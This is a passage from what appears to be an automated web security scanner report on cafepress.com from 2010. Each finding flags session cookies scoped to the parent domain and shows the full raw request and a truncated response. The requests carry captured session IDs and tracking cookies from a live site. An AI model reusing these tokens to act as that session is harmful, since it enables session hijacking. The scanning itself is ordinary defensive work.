HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58876 Date: Sun, 26 Dec 2010 13:47:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.35. http://www.cafepress.com/+underwear-panties
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+underwear-panties
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59386 Date: Sun, 26 Dec 2010 13:46:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.36. http://www.cafepress.com/+water-bottles
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+water-bottles
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 60982 Date: Sun, 26 Dec 2010 13:47:04 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/ Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60982 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.37. http://www.cafepress.com/+womens-tank-tops
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+womens-tank-tops
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+womens-tank-tops HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59652 Date: Sun, 26 Dec 2010 13:44:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/ Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.38. http://www.cafepress.com/+womens-thongs
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+womens-thongs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 61274 Date: Sun, 26 Dec 2010 13:47:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/ Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 61274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.39. http://www.cafepress.com/+yoga-mats
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+yoga-mats
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59469 Date: Sun, 26 Dec 2010 13:48:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.40. http://www.cafepress.com/TheGamingApe
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /TheGamingApe
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 49058 Date: Sun, 26 Dec 2010 13:48:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 49058 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook...[SNIP]...
2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /cp/catalogExp/RedirectWithSEOURL.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
